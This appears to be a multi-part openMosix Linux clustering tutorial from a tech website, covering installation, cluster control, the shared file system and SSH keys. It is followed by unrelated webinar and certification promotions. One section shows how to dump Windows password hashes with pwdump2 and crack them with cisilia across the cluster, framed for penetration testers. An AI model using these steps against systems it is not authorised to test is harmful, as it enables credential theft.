Bear in mind that some applications migrate very nicely over an openMosix cluster; for example, 'make' can speed up your compile times significantly. If you do a little research on the net, you'll find examples of applications that migrate well and of others that won't yield much of a speed increase. If you are a developer looking to take advantage of openMosix, applications that fork() child processes will migrate wonderfully, whereas multithreaded applications, at present, do not seem to migrate their threads.

Anyway, here are a couple of cool uses for your cluster:

Distributed Password Cracking

If you work in security or as a penetration tester, you'll probably encounter the need to crack passwords at some point or other. We regularly use l0phtcrack for Windows passwords, but were interested in the opportunity to use our nice new 10-system cluster to significantly speed things up. After briefly hunting around the net, we discovered 'Cisilia', a Linux-based Windows LM / NTLM password cracker designed specifically to take advantage of openMosix-style clustering!

You can get a copy of cisilia by visiting the following site and clicking on the R&D Projects menu on the left: http://www.citefa.gov.ar/SitioSI6_EN/si6.htm

There you'll find two files: 'cisilia', which is the actual command-line password-cracking engine, and 'xisilia', which is an X-based GUI for it. We didn't install the X-based GUI, since we were working with our cluster completely over SSH.

Once you download the RPMs, you can install them by typing:

rpm -ivh *isilia*.rpm

If you are installing from the tarball sources, as we did, it is just as simple:

1) Unzip the tarball

tar xvzf cisilia*.tar.gz

2) Enter the directory and configure the compilation process for your system:

./configure

3) Finally, start the compilation process:

make

Now you need to get a Windows password file to crack. For this you'll want to use pwdump to grab the encrypted password hashes. This is available at the following link:

https://packetstormsecurity.com/files/13790/pwdump2.zip.html

Unzip it and run it on the Windows box which has the passwords you want to crack. You will want to save the results to a file, so do the following:

pwdump2 > passwdfile

Now copy the file 'passwdfile' across to a node in your cluster. Fire up cisilia using the following command:

cisilia -l crack_file -n 20 <path to the passwdfile you copied>

•  -l   tells cisilia to save the results to a file called crack_file

•  -n  tells cisilia how many processes it should spawn. We started 20, since we wanted 2 processes to go to each node in the cluster.
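If your cluster is a different size, the -n value can simply be scaled to the node count. A minimal sketch (the node count and the path to the password file are examples only):

NODES=10

cisilia -l crack_file -n $((NODES * 2)) /root/passwdfile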

We were pleasantly surprised by how quickly it started running through 6-7 character alphanumeric passwords. Enjoy !

Encoding MP3s

Do you get annoyed by how long it takes to convert a CD to MP3? Or to convert any kind of media file?

This is one of the places where a cluster excels. When you convert your rips to MP3, you normally process one WAV file at a time; why not run the job on your cluster and let it encode all your files simultaneously?

Someone has already taken this to the absolute extreme, check out http://www.rimboy.com/cluster/ for what he's got setup.

To quickly rip a CD and convert it to digital audio, you will need 2 programs:

A digital audio extractor, and an audio encoder.

For the digital audio extractor we recommend Cdparanoia. For the audio encoder, we're going to do things a bit differently:

In the spirit of the free open source movement, we suggest you check out the OGG Vorbis encoder. This is a free, open audio compression standard that will compress your WAV files much better than MP3, and still have a higher quality!

They also play perfectly in Winamp and other media players. Sounds too good to be true? Check out their website at the link below. Of course if you still aren't convinced that OGG is better than MP3, you can replace the OGG encoder with any MP3 encoder for this tutorial.

Get and install both the cdparanoia ripper and the oggenc encoder from the following URLs:

CDparanoia - http://www.xiph.org/paranoia/

OGG Vorbis Encoder - https://xiph.org/vorbis/

Now we just need to rip and encode on our cluster. Put the CD you want to convert in the drive on one node, and just run the following:

cdparanoia -B

for i in `ls *.wav`;

do oggenc $i &

done;

This encodes your WAV files to OGG format at the default quality level of 3, which produces an OGG file of a smaller size and significantly better sound quality than an MP3 at 128kbps. You can experiment with the OGG encoder options to figure out the best audio quality for your requirements.
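If you want to trade file size for quality, oggenc accepts a quality setting. A minimal sketch (the quality level and file name are just examples):

oggenc -q 6 track01.cdda.wav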

This just about completes the openMosix tutorial we've prepared for you.

We surely hope it has been an enlightening tutorial and will help most of you make some good use of those old 'mini super computers' you never knew you had :)



OpenMosix - Part 8: Using SSH Keys Instead Of Passwords

One of the things that you'll notice with openMosixview is that if you want to change the speed sliders of a remote node, you will have some trouble. This is because openMosixview uses SSH to remotely set the speed on the node. What you need to do is set up passwordless SSH authentication using public/private keys.

This is just a quick walk-through on how to do that, for a much more detailed explanation on public/private key SSH authentication, see our tutorial in the GNU/Linux Section.

First, generate your SSH public/private key-pair:

ssh-keygen -t dsa

Second, copy the public key into the authorized keys file. Since your home directory is shared between nodes, you only need to do this on one node:

cat ~/.ssh/*.pub >>~/.ssh/authorized_keys

However, for root, you will have to do this manually for each node (replace Node# with each node individually):

cat ~/.ssh/*.pub >>/mfs/Node#/root/.ssh/authorized_keys

After this, you have to start ssh-agent to cache your key's passphrase so you only need to type it once. Add the following to your .bash_profile or .profile:

ssh-agent $SHELL

Now, each time you log in, just type 'ssh-add' and supply your passphrase once. By following this you will be able to log in to any of the nodes without a password, and the sliders in openMosixview should work perfectly for you. Next: Interesting Ideals: Distributed Password Cracking & Encoding MP3s
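To confirm the passwordless setup before relying on openMosixview, try running a one-off command on another node; if no password prompt appears, the keys and ssh-agent are working (the IP address below is just an example node):

ssh 192.168.1.11 uptime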


OpenMosix - Part 7: The openMosix File System

You've probably been wondering how openMosix handles things like file read/writes when a process migrates to another node.

For example, if we run a process that needs to read some data from the file /etc/test.conf on our local machine and that process migrates to another node, how will openMosix read the file? The answer lies in the openMosix File System, or OMFS.

OMFS does several things. Firstly, it shares your disk between all the nodes in the cluster, allowing them to read and write to the relevant files. It also uses what is known as Direct File System Access (DFSA), which allows a migrated process to run many system calls locally, rather than wasting time executing them on the home node. It works somewhat like NFS, but has features that are required for clustering.

If you installed openMosix from the RPMs, the omfs should already be created and automatically mounted. Have a look in /mfs, and you will see a subdirectory for every node in the cluster, named after the node ID. These directories will contain the shared disks of that particular node.

You will also see some symlinks like the following:

here -> maps to the current node where your process runs

home -> maps to your home node
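As a quick illustration, once OMFS is mounted you can browse another node's filesystem directly through /mfs (the node ID below is only an example):

ls /mfs/2/etc

cat /mfs/2/etc/hostname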

If the /mfs directory has not been created, you can mount it manually with the following:

mkdir /mfs

mount /mfs /mfs -t mfs

If you want it to be automatically mounted at boot time, you can create the following entry in your /etc/fstab

mfs_mnt /mfs mfs dfsa=1 0 0

Bear in mind that this entry has to be on all the nodes in the cluster. Lastly, you can turn the openMosix file system off using the command:

mosctl nomfs

Now that we've got that all covered, it's time to take a look at how you can make the SSH login process less time-consuming, allowing you to take control of all your cluster nodes any time you require, but also helping the cluster system execute special functions. The next topic covers using SSH keys with openMosix instead of passwords.


OpenMosix - Part 6: Controlling Your OpenMosix Cluster

The openMosix team have provided a number of ways of controlling your cluster, both from the command line and through GUI-based tools in X.

From the command line, the main monitoring and control tools are:

  • mosmon – which shows you the load on each of the nodes, their speed, memory usage, etc. Pressing 'h' will bring up the help with the different options;
  • mosctl - which is a very powerful command that allows you to control how your system behaves in the cluster, some of the interesting options are:
    • mosctl block – this stops other people's processes being run on your system (a bit selfish don't you think ;))
    • mosctl -block – the opposite of the above
    • mosctl lstay – this stops your local processes migrating to other nodes for processing
    • mosctl nolstay – the opposite of the above
    • mosctl setspeed <number> - which sets the max processing speed to contribute. 10000 is a benchmark of a Pentium 3 1GHz.
    • mosctl whois <node number> - this tells you the IP address of a particular node
    • mosctl expel – this expels any current remote processes and blocks new ones from coming in
    • mosctl bring – this brings back any of your own local processes that have migrated to other nodes
    • mosctl status <node number> - which shows you whether the node is up and whether it is 'blocking' processes, 'staying' them, etc.
  • mosrun - allows you to run a process controlling which nodes it should run on
  • mps - this is just like 'ps' to show you the process listing, but it also shows which node a process is running on
  • migrate - this command allows you to manually migrate a process to any node you like; the syntax is 'migrate <pid> <node #>'. You can also use 'migrate <pid> balance' to load balance a process automatically.
  • dsh - Distributed Shell. This allows you to run a command on all the nodes simultaneously. For example 'dsh -a reboot' will reboot all the nodes.
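To put a few of these together, here is a minimal sketch of temporarily taking your node out of the load-balancing pool and then manually migrating one process (the PID and node numbers are examples only):

mosctl expel (push remote processes off this node and refuse new ones)

mosctl bring (bring our own migrated processes back home)

migrate 4211 3 (manually send local process 4211 to node 3)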

From the GUI, you can just start 'openmosixview'. This allows you to view and manage all the nodes in your cluster. It also shows you the load-balancing efficiency of the cluster in near-real-time, and you can see the total speed and RAM that your cluster is providing you:

linux-openmosix-controlling-cluster-1

Note that all cluster nodes that are online are represented in green, while all offline nodes are shown in red.

One of the neatest things about 'openmosixview' is the GUI for controlling process migration.

linux-openmosix-controlling-cluster-2

It depicts your current node at the center, and other nodes in the cluster around it. The ring around your node represents the processes running on your local box. If you hover over any of them you can see the process name and PID. Whenever one of your processes migrates to another node, you will see it detach and appear on a new node with a line linking it to your system!

You can also manually control the migration. You can drag and drop your processes onto other nodes; even selecting multiple processes and then dragging them to another node is easy. If you double-click on a process running on a remote node, it will come back home and execute locally.

You can also open the openMosix process monitor which shows you which process is running on which node.

There is also a history analyzer to show you the load over a period of time. This allows you to see how your cluster was being used at any given point in time:

linux-openmosix-controlling-cluster-3

As you can see, the GUI tools are very powerful; they provide you with a large amount of the functionality that the command-line tools do. If, however, you want to write your own scripts, the command-line tools are much more versatile. Managing a cluster can be a lot of fun, so modify the options and play around with the GUI to tweak and optimize your raw processing power! Our next article covers the openMosix File System.


OpenMosix - Part 5: Testing Your Cluster

Now let's actually make this cluster do some work! There is a quick tool you can use to monitor the load of your cluster.

Type 'mosmon' and press enter. You should see a screen similar to the screenshot below:

linux-openmosix-testing-cluster-1

 

Run mosmon in one VTY (press ctrl+alt+f1), then switch to another VTY (ctrl+alt+f2)

Let's run a simple awk command with a nested loop to use up some processing power. If everything goes well, we should see the load in mosmon jump up on one node and then migrate to the other nodes.

The command you need to run is:

awk 'BEGIN {for(i=0;i<10000;i++)for(j=0;j<10000;j++);}'

If you choose to, you can start multiple awk processes by backgrounding them. Just append an ‘&' to the command line and run it a few times.
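For example, to launch several of them at once, a loop like the following can be used (the count of four is arbitrary):

for n in 1 2 3 4; do awk 'BEGIN {for(i=0;i<10000;i++)for(j=0;j<10000;j++);}' & done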

Go back to mosmon by pressing ctrl+alt+f1; you should see the load rising on your current node and then slowly distributing to the other machines in the cluster, as in the picture below:

linux-openmosix-testing-cluster-2

Congratulations! You are now taking advantage of multi system clustering!

If you want to time the process running locally, turn off openMosix by entering the command:

/etc/init.d/openmosix stop

Then run the following script:

#!/bin/sh
date
awk 'BEGIN {for(i=0;i<10000;i++)for(j=0;j<10000;j++);}'
date

This will tell you how long it took to perform the task. You can modify the loop values to make it last longer. Now restart openmosix, using the command:

/etc/init.d/openmosix start

Re-run the script to see how long it takes to process. Remember that your network is a bottleneck for performance. If your process finishes really quickly, it won't have time to migrate to the other nodes over the network. This is where tweaking and optimizing your cluster becomes fun.
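As an alternative to the date-based script above, the shell's built-in time command gives a similar measurement in a single line:

time awk 'BEGIN {for(i=0;i<10000;i++)for(j=0;j<10000;j++);}'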

Next up we'll take a look at how you can control an openMosix cluster.


OpenMosix - Part 4: Starting Up Your OpenMosix Cluster

Okay, so now that you've got a couple of machines with openMosix installed and booted, it's time to understand how to add systems to your cluster and make them work together.

OpenMosix has two ways of doing this:

1. Auto-discovery of Cluster Nodes

OpenMosix includes a daemon called 'omdiscd' which identifies other openMosix nodes on the network by using multicast packets (for more on multicasting, please see our multicast page). This means that you don't have to bother manually configuring the nodes. This is a simple way to get your cluster going as you just need to boot a machine and ensure it's on the network. When this stage is complete, it should then discover the existing cluster and add itself automatically!

Make sure you set up your network properly. As an example, if you are assigning an IP address of 192.168.1.10 to your first ethernet interface and your default gateway is 192.168.1.1 you would do something like this:

ifconfig eth0 192.168.1.10 netmask 255.255.255.0 broadcast 192.168.1.255 up (configures your system's ethernet interface)

route add default gw 192.168.1.1 (adds the default gateway)

The auto-discovery daemon might have started automatically on bootup; check using:

ps aux | grep 'omdiscd'

The above command should reveal the 'omdiscd' process running on your system.

If it hasn't, you can start it manually by typing 'omdiscd'. If you want to see the nodes getting added, you can choose to run omdiscd in the foreground by typing 'omdiscd -n'. This will help you troubleshoot the auto-discovery.

2. The /etc/openmosix.map File Configuration

If you don't want to use autodiscovery, you can manually manage your nodes using the openmosix.map file in the /etc directory. This file basically contains a list of the nodes on your cluster, and has to be the same across all the nodes in your cluster.

The syntax is very simple: it is a tab-delimited list of the nodes in your cluster, with three fields:

Node ID, IP Address and Number.

•  Node ID is the unique number for the node.

•  IP address is the IP address of the node.

•  Number specifies how many consecutive nodes are in the range starting at that IP address.

As an example, if you have nodes

192.168.1.10

192.168.1.11

192.168.1.12

192.168.1.50

your file would look like this:

1 192.168.1.10 3

4 192.168.1.50 1

We could have manually specified 192.168.1.11 and 192.168.1.12 as separate entries, but by using the 'number' field, openMosix counts up the last octet of the IP and saves you the trouble of making individual entries.

Once you've done your configuration, you can control openMosix using the init.d script that should have been installed. If it was not, you can find it in the scripts directory of the userland tools you downloaded; make it executable and copy it to the init.d directory like this:

mv ./openmosix /etc/init.d

chmod 755 /etc/init.d/openmosix

You can now start, stop and restart openMosix with the following commands:

/etc/init.d/openmosix start

/etc/init.d/openmosix stop

/etc/init.d/openmosix restart

Next up we'll take a look at how you can test your new openMosix cluster!


OpenMosix - Part 3: Using ClusterKnoppix

So maybe none of those methods worked for you. Well, you'll be happy to know that you can get a cluster up and running within a few minutes using an incredible bootable Knoppix liveCD that is preconfigured for clustering. It's called ‘ClusterKnoppix' and a quick search on Google will reveal a number of sources from where you can download the ISO images.

The best thing about ClusterKnoppix is that you can just boot a system with the CD and it will automatically add itself to the cluster. You don't even need to install the O/S to your hard disk. This makes it a very useful way to set up a cluster in a hurry using pre-existing systems.

Another really nice feature is that you don't need to burn 20 copies of the CD to make a 20 system cluster. Just boot one system with the CD, and then run the command

knoppix-terminalopenmosixserver

This will let you set up a clustering-enabled terminal server. Now if you have any systems that can boot from their network card (PXE-compliant booting), they will automatically download a kernel image and run ClusterKnoppix!

It's awesome to see this at work, especially since we were working with 2 systems that didn't have a CD-ROM drive or a hard-disk. They just became diskless clients and contributed their resources to the cause! Next page covers starting up your openMosix Cluster.


OpenMosix - Part 2: Building An openMosix Cluster

Okay, let's get down to the fun part! Although it may sound hard, setting up a cluster is not very difficult. We're going to show you the hard way (which will teach you more) as well as a very neat, quick way to set up an instant cluster using a Knoppix Live CD. We suggest you try both out to understand the benefits of each approach.

We will require the following:

1. Two or more machines (we need to cluster something!); the configuration doesn't matter, even if they are lower end. They will require network cards and need to be connected to each other over a network. Obviously, the more systems you have, the more powerful your cluster will be. Don't worry if you don't have many machines; we'll show you how to temporarily use resources from systems and schedule when they can contribute their processing power (this works very well in an office where you might want some systems to join the cluster only after office hours).

2. A ClusterKnoppix LiveCD for the second part of this tutorial. While this is not strictly necessary, we want to show you some of the advantages of using the LiveCD for clustering. It also makes setting up the cluster extremely easy; you can get a fully working cluster up in the amount of time it takes you to boot a system! You can get ClusterKnoppix from the following link: https://distrowatch.com/table.php?distribution=clusterknoppix

Getting & Installing openMosix

OpenMosix consists of two parts: the first is the kernel patch, which does the actual clustering, and the second is the userland tools, which allow you to monitor and control your cluster.

There are a variety of ways to install openMosix; we've chosen to show three of them:

1. Patching the kernel and installing from the source

2. Installing from RPM's

3. Installing in Debian

1. Installing from source

The latest version of openMosix at the time of this writing works with the kernel version 2.4.24. If you want to do this the proper way, get the plain kernel sources for 2.4.24 from https://www.kernel.org/ and the openMosix patch for the same version of the kernel from https://sourceforge.net/projects/openmosix/

At the time of writing this, the direct kernel source link is

http://www.kernel.org/pub/linux/kernel/v2.4/linux-2.4.24.tar.bz2

Once you've got the kernel sources, unpack them to your kernel source directory, in this case that should be:

/usr/src/linux-2.4.24

Now move the openMosix patch to the kernel source directory and apply it, like so:

mv /root/openMosix-2.4.24.gz /usr/src/linux-2.4.24

cd /usr/src/linux-2.4.24

zcat openMosix-2.4.24.gz | patch -Np1

NOTE: If you downloaded a bzip zipped file, you might need to use 'bzcat' rather than 'zcat' in the last line.

Now your kernel sources are patched with openMosix.

Now you have to configure your kernel sources, using one of the following commands:

make config

make menuconfig (uses an ncurses interface)

make xconfig (uses a TCL/TK GUI interface)

If you use X and have a recent distribution, 'make xconfig' is your best bet. Once you get the kernel configuration screens, enable the following openMosix options in the kernel configuration:

CONFIG_MOSIX=y

# CONFIG_MOSIX_TOPOLOGY is not set

CONFIG_MOSIX_UDB=y

# CONFIG_MOSIX_DEBUG is not set

# CONFIG_MOSIX_CHEAT_MIGSELF is not set

CONFIG_MOSIX_WEEEEEEEEE=y

CONFIG_MOSIX_DIAG=y

CONFIG_MOSIX_SECUREPORTS=y

CONFIG_MOSIX_DISCLOSURE=3

CONFIG_QKERNEL_EXT=y

CONFIG_MOSIX_DFSA=y

CONFIG_MOSIX_FS=y

CONFIG_MOSIX_PIPE_EXCEPTIONS=y

CONFIG_QOS_JID=y

Feel free to tweak your other kernel settings based on your hardware and requirements just as you would when installing a new kernel.

Finally, finish it all off by compiling the kernel with:

make dep bzImage modules modules_install

Now install your new kernel in your bootloader. For example, if you use LILO, edit your /etc/lilo.conf and create a new entry for your openMosix enhanced kernel. If you simply copy the entry for your regular kernel and change the kernel image to point to your new kernel, this should be enough. Don't forget to run 'lilo' when you finish editing the file.
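As a rough illustration, an openMosix entry in lilo.conf could look like the following. This assumes you have already copied the newly compiled bzImage from arch/i386/boot/ into /boot; the image path, label and root device are placeholders for your own setup:

image=/boot/vmlinuz-2.4.24-openmosix
  label=openmosix
  root=/dev/hda1
  read-only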

After you have completed this, reboot, and if all went well, you should be able to select the openMosix kernel you just installed and boot with it. If something didn't work right, you can still select your regular kernel and boot normally to troubleshoot.

2. Installing from RPM

If you have an RPM based distribution, you can directly get a pre-compiled kernel image with openMosix enabled from the openMosix site (https://sourceforge.net/projects/openmosix/).

This is a fairly easy way to install openMosix as you just need to install two RPMs. This should work with Red Hat, SUSE etc. Get the latest RPMs for:

a) openmosix-kernel

b) openmosix-tools

Now you can simply install both of these by using the command:

rpm -Uvh openmosix*.rpm

If you are using GRUB, the RPMs will even make the entry in your GRUB config so you can just reboot and select the new kernel. If you use LILO you will have to manually make the entry in /etc/lilo.conf. Simply copying the entry for your regular kernel and changing the kernel image to point to your new kernel should be enough. Don't forget to run 'lilo' when you finish editing the file.

That should be all you need to do for the RPM based installation. Just reboot and choose the openMosix kernel when you are given the choice.

3. Installing in Debian

You can install the RPMs in Debian as well using Alien, but it is better to use apt-get to install the kernel sources and the openMosix kernel patch. You can also use 'apt-get' to install openmosixview, which will give you a GUI to manage the cluster.

This is the basic procedure to follow for installing openMosix under Debian.

First, get the packages:

cd /usr/src

apt-get install kernel-source-2.4.24 kernel-package \
openmosix kernel-patch-openmosix

Untar them and create the links:

tar vxjf kernel-source-2.4.24.tar.bz2

ln -s /usr/src/kernel-source-2.4.24 /usr/src/linux

Apply the patch:

cd /usr/src/linux

../kernel-patches/i386/apply/openmosix

Install the kernel:

make menuconfig

make-kpkg kernel_image modules_image

cd ..

dpkg -i kernel-image-*-openmosix-*.deb

After this you can use 'apt-get' to install the openmosixview GUI utility for managing your cluster using the following command:

apt-get install openmosixview

Assuming you've also got your ClusterKnoppix LiveCD ready, you're ready to start using it, which happens to be the topic of the next section: Using ClusterKnoppix


OpenMosix - Part 1: Understanding openMosix

As we said before, openMosix is a single system image clustering extension for the Linux kernel. It has its roots in the extremely popular MOSIX clustering project, the main difference being that it is distributed under the GNU General Public License.

It allows a cluster of computers to behave like one big multi-processor computer. For example, if you run 2 processes on a single machine, each process will only get 50% of the CPU time. However, if you run both these processes over a 2 node cluster, each process will get 100% CPU time since there are two processors available. In essence, this behavior is very similar to SMP (Symmetric Multi-Processor) systems.

Diving Deeper

What openMosix does is balance the processing load over the systems in the cluster, taking into account the speed of the systems and the load they already have. Note however, that it does not parallelize the processing. Each individual process only runs on one computer at a time.

To quote the openMosix website example:

'If your computer could convert a WAV to a MP3 in a minute, then buying another nine computers and joining them in a ten-node openMosix cluster would NOT let you convert a WAV in six seconds. However, what it would allow you to do is convert 10 WAVs simultaneously. Each one would take a minute, but since you can do lots in parallel you'd get through your CD collection much faster.'

This simultaneous processing has a lot of uses, as there are many tasks that adapt extremely well to being used on a cluster. In the later sections, we'll show you some practical and fun uses for an openMosix based GNU/Linux cluster. Next: Building An openMosix Cluster

 


FREE WEBINAR: Microsoft Azure Certifications Explained - A Deep Dive for IT Professionals in 2020

It’s common knowledge, or at least should be, that certifications are the most effective way for IT professionals to climb the career ladder, and this is only becoming more important in an increasingly competitive professional marketplace. Similarly, cloud-based technologies are experiencing unparalleled growth, and the demand for IT professionals with qualifications in this sector is growing rapidly. Make 2020 your breakthrough year: check out this upcoming FREE webinar hosted by two Microsoft cloud experts to plan your Azure certification strategy in 2020.

microsoft azure certifications explained

The webinar features a full analysis of the Microsoft Azure certification landscape in 2020, giving you the knowledge to properly prepare for a future working with cloud-based workloads. Seasoned veterans Microsoft MVP Andy Syrewicze and Microsoft cloud expert Michael Bender will be hosting the event, which covers Azure certification tracks, training and examination costs, learning materials, resources and labs for self-study, how to gain access to FREE Azure resources, and more.

Altaro’s webinars are always well attended and one reason for this is the encouragement for attendee participation. Every single question asked is answered and no stone is left unturned by the presenters. They also present the event live twice to allow as many people as possible to have the chance of attending the event and asking their questions in person! 

For IT professionals in 2020, and especially those with a Microsoft ecosystem focus, this event is a must-attend! 

The webinar will be held on Wednesday February 19, at 3pm CET/6am PST/9am EST and again at 7pm CET/10am PST/1pm EST. I’ll be attending so I’ll see you there!

While the event date has passed, it has been recorded and is available for viewing. All materials are available as direct downloads. Click here to access the event.


Free Webinar: Azure Security Center: How to Protect Your Datacenter with Next Generation Security

Security is a major concern for IT admins, and if you’re responsible for important workloads hosted in Azure, you need to know your security is as tight as possible. In this free webinar, presented by Thomas Maurer, Senior Cloud Advocate on the Microsoft Azure Engineering Team, and Microsoft MVP Andy Syrewicze, you will learn how to use Azure Security Center to ensure your cloud environment is fully protected.

There are certain topics in the IT administration world which are optional, but security is not one of them. Ensuring your security knowledge is ahead of the curve is an absolute necessity, and it is becoming increasingly important as we are all exposed to more and more online threats every day. If you are responsible for important workloads hosted in Azure, this webinar is a must!

The webinar covers:

  • Azure Security Center introductions
  • Deployment and first steps
  • Best practices
  • Integration with other tools
  • And much more!

Being an Altaro-hosted webinar, expect this webinar to be packed full of actionable information presented via live demos so you can see the theory put into practice before your eyes. Also, Altaro put a heavy emphasis on interactivity, encouraging questions from attendees and using engaging polls to get instant feedback on the session. To ensure as many people as possible have this opportunity, Altaro present the webinar live twice so pick the best time for you and don’t be afraid to ask as many questions as you like!

Webinar: Azure Security Center: How to Protect Your Datacenter with Next Generation Security
Date: Tuesday, 30th July
Time: Webinar presented live twice on the day. Choose your preferred time:

  • 2pm CEST / 5am PDT / 8am EDT
  • 7pm CEST / 10am PDT / 1pm EDT

While the event date has passed, it has been recorded and is available for viewing. All materials are available as direct downloads. Click here to access the event.



Major Cisco Certification Changes - New Cisco CCNA, CCNP Enterprise, Specialist, DevNet and more from Feb. 2020

Cisco announced a major update to their CCNA, CCNP and CCIE certification program at Cisco Live last week, with the changes happening on the 24th February 2020.

CCNA & CCENT Certification

The 10 current CCNA tracks (CCNA Routing and Switching, CCNA Cloud, CCNA Collaboration, CCNA Cyber Ops, CCNA Data Center, CCNA Industrial, CCNA Security, CCNA Service Provider, CCNA Wireless and CCNA Design) are being retired and replaced with a single ‘CCNA’ certification. The new CCNA exam combines most of the information on the current CCNA Routing and Switching with additional wireless, security and network automation content.

A new Cisco Certified DevNet Associate certification is also being released to satisfy the increasing demand in this area.

The current CCENT certification is being retired. There hasn’t been an official announcement from Cisco yet, but rumours suggest we may see new ‘Foundations’ certifications which will focus on content from the retiring CCNA tracks.

CCNP Certification

Different technology tracks remain at the CCNP level. CCNP Routing and Switching, CCNP Design and CCNP Wireless are being consolidated into the new CCNP Enterprise, and CCNP Cloud is being retired. A new Cisco Certified DevNet Professional certification is also being released.

Only two exams will be required to achieve each CCNP certification – a Core and a Concentration exam. Being CCNA certified will no longer be a prerequisite for the CCNP certification.

If you pass any CCNP level exams before February 24 2020, you’ll receive badging for corresponding new exams and credit toward the new CCNP certification.

New Cisco certification roadmap for 2020 (click to enlarge)

CCIE Certification

The format of the CCIE remains largely the same, with a written and lab exam required to achieve the certification. The CCNP Core exam will now serve as the CCIE written exam, so there will no longer be a separate written exam at the CCIE level. Automation and Network Programmability are being added to the exams for every track.

All certifications will be valid for 3 years under the new program so you will no longer need to recertify CCIE every 2 years.

How the Changes Affect You

If you’re currently studying for any Cisco certification the advice from Cisco is to keep going. If you pass before the cutover your certification will remain valid for 3 years from the date you certify. If you pass some but not all CCNP level exams before the change you can receive credit towards the new certifications.

We've added a few resources you can turn to for additional information:

The Flackbox blog has a comprehensive video and text post covering all the changes.

The official Cisco certification page is here.


Free Azure IaaS Webinar with Microsoft Azure Engineering Team

Implementing Infrastructure as a Service (IaaS) is a great way of streamlining and optimizing your IT environment by utilizing virtualized resources from the cloud to complement your existing on-site infrastructure. It enables a flexible combination of the traditional on-premises data center alongside the benefits of cloud-based subscription services. If you’re not making use of this model, there’s no better opportunity to learn what it can do for you than in the upcoming webinar from Altaro: How to Supercharge your Infrastructure with Azure IaaS.

The webinar will be presented by Thomas Maurer, who has recently been appointed Senior Cloud Advocate on the Microsoft Azure Engineering Team, alongside Altaro Technical Evangelist and Microsoft MVP Andy Syrewicze.

The webinar will be primarily focused on showing how Azure IaaS solves real use cases by going through the scenarios live on air. Three use cases have been outlined already, however, the webinar format encourages those attending to suggest their own use cases when signing up and the two most popular suggestions will be added to the list for Thomas and Andy to tackle. To submit your own use case request, simply fill out the suggestion box in the sign up form when you register!

Once again, this webinar is going to presented live twice on the day (Wednesday 13th February). So if you can’t make the earlier session (2pm CET / 8am EST / 5am PST), just sign up for the later one instead (7pm CET / 1pm EST / 10am PST) - or vice versa. Both sessions cover the same content but having two live sessions gives more people the opportunity to ask their questions live on air and get instant feedback from these Microsoft experts.

Save your seat for the webinar!


While the event date has passed, it has been recorded and is available for viewing. All materials are available as direct downloads. Click here to access the event.


Altaro VM Backup v8 (VMware & Hyper-V) with WAN-Optimized Replication dramatically reduces Recovery Time Objective (RTO)

Altaro, a global leader in virtual machine data protection and recovery, has introduced WAN-Optimized Replication in its latest version, v8, allowing businesses to be back up and running in minimal time should disaster strike. Replication permits a business to make an ongoing copy of its virtual machines (VMs) and to access that copy with immediacy should anything go wrong with the live VMs. This dramatically reduces the recovery time objective (RTO).

VMware and Hyper-V Backup

Optimized for WANs, Altaro's WAN-Optimized Replication enables system administrators to replicate ongoing changes to their virtual machines (VMs) to a remote site and to seamlessly continue working from the replicated VMs should something go wrong with the live VMs, such as damage due to severe weather conditions, flooding, ransomware, viruses, server crashes and so on.

Drastically Reducing RTO

"WAN-Optimized Replication allows businesses to continue accessing and working in the case of damage to their on-premise servers. If their office building is hit by a hurricane and experiences flooding, for instance, they can continue working from their VMs that have been replicated to an offsite location," explained David Vella, CEO and co-founder of Altaro Software.

"As these are continually updated with changes, businesses using Altaro VM Backup can continue working without a glitch, with minimal to no data loss, and with an excellent recovery time objective, or RTO."

Click here to download your free copy of Altaro VMware Backup.

Centralised, Multi-tenant View For MSPs

Managed Service Providers (MSPs) can now add replication services to their offering, with the ability to replicate customer data to the MSP's infrastructure. This way, if a customer site goes down, that customer can immediately access its VMs through the MSP's infrastructure and continue working.

With Altaro VM Backup for MSPs, MSPs can manage their customer accounts through a multi-tenant online console for greater ease, speed and efficiency, enabling them to provide their customers with a better, faster service.

How To Upgrade

WAN-Optimized Replication is currently available exclusively for customers who have the Unlimited Plus edition of Altaro VM Backup. It is automatically included in Altaro VM Backup for MSPs.

Upgrading to Altaro VM Backup v8 is free for Unlimited Plus customers who have a valid Software Maintenance Agreement (SMA). The latest build can be downloaded from this page. If customers are not under active SMA, they should contact their Altaro Partner for information about how to upgrade.

New users can benefit from a fully-functional 30-day trial of Altaro VM Backup Unlimited Plus.


Free Live Demo Webinar: Windows Server 2019 in Action

So you’ve heard all about Windows Server 2019 - now you can see it in action in a live demo webinar on November 8th! The last WS2019 webinar by Altaro was hugely popular, with over 4,500 IT pros registering for the event. Feedback was gathered from that webinar, and the most popular features will now be tested live by Microsoft MVP Andy Syrewicze. And you’re invited!

This deep-dive webinar will focus on:

  • Windows Admin Center
  • Containers on Windows Server
  • Storage Migration Service
  • Windows Subsystem for Linux
  • And more!

Demo webinars are a really great way to see a product in action before you decide to take the plunge yourself. They enable you to see the strengths and weaknesses first-hand and also to ask questions that might relate specifically to your own environment. With demand so high, the webinar is presented live twice on November 8th to help as many people benefit as possible.


The first session is at 2pm CET/8am EST/5am PST and the second is at 7pm CET/1pm EST/10am PST. With the record number of attendees for the last webinar, some people were unable to attend the sessions which were maxed out. It is advised you save your seat early for this webinar to keep informed and ensure you don’t miss the live event.

Save your seat: https://goo.gl/2RKrSe

While the event date has passed, it has been recorded and is available for viewing. All materials are available as direct downloads. Click here to access the event.


Windows Server 2019 Free Webinar

With Microsoft Ignite just around the corner, Windows Server 2019 is set to get its full release and the signs look good. Very good. Unless you’re part of the Windows Server insider program - which grants you access to the latest Windows Server Preview builds - you probably haven’t had a hands-on experience yet with Windows Server 2019 but the guys over at Altaro have and are preparing to host a webinar on the 3rd of October to tell you all about it.


The webinar will be held a week after Microsoft Ignite so it will cover the complete feature set included in the full release as well as a more in-depth look at the most important features in Windows Server 2019. Whenever a new version of Windows Server gets released there’s always a lot of attention and media coverage so it’s nice to have an hour long session where you can sit back and let a panel of Microsoft experts cut through the noise and give you all the information you need.

It’s also a great chance to ask your questions directly to those with the inside knowledge and receive answers live on air. Over 2,000 people have now registered for this webinar and we’re going to be joining too. It’s free to register - what are you waiting for?

Save your seat: https://goo.gl/V9tYYb

Note: While this event has passed, it’s still available to view and all related/presented material can be downloaded. Click on the above link to access the event recording.


Download HP Service Pack (SPP) for ProLiant Servers for Free (Firmware & Drivers .ISO)– Directly from HP!

